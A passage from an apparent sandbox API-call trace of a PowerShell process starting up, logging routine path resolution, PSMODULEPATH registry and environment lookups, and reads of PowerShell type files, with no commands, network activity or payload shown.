lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.598] GetLastError () returned 0x3 [0049.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.599] GetLastError () returned 0x3 [0049.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.599] GetLastError () returned 0x3 [0049.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.599] GetLastError () returned 0x3 [0049.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.599] GetLastError () returned 0x3 [0049.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.599] GetLastError () returned 0x3 [0049.602] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0049.602] GetLastError () returned 0x3 [0049.605] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x247300, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0049.605] GetLastError () returned 0x3 [0049.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e6d0 | out: phkResult=0x19e6d0*=0x350) returned 0x0 [0049.605] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x19e714, lpData=0x0, lpcbData=0x19e710*=0x0 | out: lpType=0x19e714*=0x2, lpData=0x0, lpcbData=0x19e710*=0x6c) returned 0x0 [0049.607] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x19e714, lpData=0x247300, lpcbData=0x19e710*=0x6c | out: lpType=0x19e714*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x19e710*=0x6c) returned 0x0 [0049.607] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x247300, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0049.607] GetLastError () returned 0x3 [0049.607] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x247300, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0049.607] GetLastError () returned 0x3 [0049.608] RegCloseKey (hKey=0x350) returned 0x0 [0049.609] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x247300, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0049.609] GetLastError () returned 0x3 [0049.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e6d0 | out: phkResult=0x19e6d0*=0x350) returned 0x0 [0049.609] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x19e714, lpData=0x0, lpcbData=0x19e710*=0x0 | out: lpType=0x19e714*=0x0, lpData=0x0, lpcbData=0x19e710*=0x0) returned 0x2 [0049.610] RegCloseKey (hKey=0x350) returned 0x0 [0049.628] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x247300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0049.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x19e238, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0049.629] GetLastError () returned 0x3f0 [0049.630] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0049.630] GetLastError () returned 0x3f0 [0049.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.640] GetLastError () returned 0xcb [0049.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.641] GetLastError () returned 0xcb [0049.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.646] GetLastError () returned 0xcb [0049.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.646] GetLastError () returned 0xcb [0049.652] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e650 | out: phkResult=0x19e650*=0x358) returned 0x0 [0049.654] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x19e6b8, lpData=0x0, lpcbData=0x19e6b4*=0x0 | out: lpType=0x19e6b8*=0x1, lpData=0x0, lpcbData=0x19e6b4*=0x74) returned 0x0 [0049.655] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x19e698, lpData=0x0, lpcbData=0x19e694*=0x0 | out: lpType=0x19e698*=0x1, lpData=0x0, lpcbData=0x19e694*=0x74) returned 0x0 [0049.655] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x19e698, lpData=0x247300, lpcbData=0x19e694*=0x74 | out: lpType=0x19e698*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x19e694*=0x74) returned 0x0 [0049.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x19e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0049.655] GetLastError () returned 0xcb [0049.655] SetErrorMode (uMode=0x1) returned 0x1 [0049.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x19e698 | out: lpFileInformation=0x19e698*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0049.655] GetLastError () returned 0xcb [0049.656] SetErrorMode (uMode=0x1) returned 0x1 [0049.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e20c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0049.659] GetLastError () returned 0xcb [0049.659] SetErrorMode (uMode=0x1) returned 0x1 [0049.659] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e68c | out: lpFileInformation=0x19e68c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0049.660] GetLastError () returned 0xcb [0049.660] SetErrorMode (uMode=0x1) returned 0x1 [0049.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e20c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0049.662] GetLastError () returned 0xcb [0049.662] SetErrorMode (uMode=0x1) returned 0x1 [0049.662] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e68c | out: lpFileInformation=0x19e68c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0049.663] GetLastError () returned 0xcb [0049.663] SetErrorMode (uMode=0x1) returned 0x1 [0049.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.669] GetLastError () returned 0xcb [0049.671] GetACP () returned 0x4e4 [0049.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e09c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0049.681] GetLastError () returned 0xcb [0049.681] SetErrorMode (uMode=0x1) returned 0x1 [0049.682] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c [0049.682] GetLastError () returned 0x0 [0049.683] GetFileType (hFile=0x35c) returned 0x1 [0049.683] SetErrorMode (uMode=0x1) returned 0x1 [0049.683] GetFileType (hFile=0x35c) returned 0x1 [0049.684] ReadFile (in: hFile=0x35c, lpBuffer=0x2b982f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2b982f8*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.686] GetLastError () returned 0x0 [0049.687] ReadFile (in: hFile=0x35c, lpBuffer=0x2b982f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2b982f8*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.687] GetLastError () returned 0x0 [0049.688] ReadFile (in: hFile=0x35c, lpBuffer=0x2b982f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2b982f8*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.688] GetLastError () returned 0x0 [0049.688] ReadFile (in: hFile=0x35c, lpBuffer=0x2b982f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2b982f8*, lpNumberOfBytesRead=0x19e604*=0xcf3, lpOverlapped=0x0) returned 1 [0049.688] GetLastError () returned 0x0 [0049.688] ReadFile (in: hFile=0x35c, lpBuffer=0x2b9778b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2b9778b*, lpNumberOfBytesRead=0x19e604*=0x0, lpOverlapped=0x0) returned 1 [0049.688] GetLastError () returned 0x0 [0049.688] ReadFile (in: hFile=0x35c, lpBuffer=0x2b982f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2b982f8*, lpNumberOfBytesRead=0x19e604*=0x0, lpOverlapped=0x0) returned 1 [0049.688] GetLastError () returned 0x0 [0049.689] CloseHandle (hObject=0x35c) returned 1 [0049.689] GetLastError () returned 0x0 [0049.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e164, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0049.690] GetLastError () returned 0x0 [0049.690] SetErrorMode (uMode=0x1) returned 0x1 [0049.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ba966c | out: lpFileInformation=0x2ba966c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0049.691] GetLastError () returned 0x0 [0049.691] SetErrorMode (uMode=0x1) returned 0x1 [0049.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0049.692] GetLastError () returned 0x0 [0049.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e588 | out: phkResult=0x19e588*=0x35c) returned 0x0 [0049.693] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e5d0, lpData=0x0, lpcbData=0x19e5cc*=0x0 | out: lpType=0x19e5d0*=0x1, lpData=0x0, lpcbData=0x19e5cc*=0x56) returned 0x0 [0049.693] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e5d0, lpData=0x247300, lpcbData=0x19e5cc*=0x56 | out: lpType=0x19e5d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e5cc*=0x56) returned 0x0 [0049.694] RegCloseKey (hKey=0x35c) returned 0x0 [0049.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0049.694] GetLastError () returned 0x0 [0049.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0049.694] GetLastError () returned 0x0 [0049.743] GetSystemInfo (in: lpSystemInfo=0x19dd08 | out: lpSystemInfo=0x19dd08*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0049.744] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e09c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0049.770] GetLastError () returned 0x0 [0049.771] SetErrorMode (uMode=0x1) returned 0x1 [0049.771] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c [0049.771] GetLastError () returned 0x0 [0049.771] GetFileType (hFile=0x35c) returned 0x1 [0049.771] SetErrorMode (uMode=0x1) returned 0x1 [0049.771] GetFileType (hFile=0x35c) returned 0x1 [0049.771] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.774] GetLastError () returned 0x0 [0049.774] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.775] GetLastError () returned 0x0 [0049.776] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.776] GetLastError () returned 0x0 [0049.776] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.776] GetLastError () returned 0x0 [0049.776] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.777] GetLastError () returned 0x0 [0049.778] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.778] GetLastError () returned 0x0 [0049.778] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.778] GetLastError () returned 0x0 [0049.778] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.778] GetLastError () returned 0x0 [0049.778] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.778] GetLastError () returned 0x0 [0049.779] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.779] GetLastError () returned 0x0 [0049.779] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.779] GetLastError () returned 0x0 [0049.779] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.780] GetLastError () returned 0x0 [0049.780] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.780] GetLastError () returned 0x0 [0049.780] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.780] GetLastError () returned 0x0 [0049.780] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.780] GetLastError () returned 0x0 [0049.780] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.780] GetLastError () returned 0x0 [0049.780] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.781] GetLastError () returned 0x0 [0049.783] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.783] GetLastError () returned 0x0 [0049.783] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, 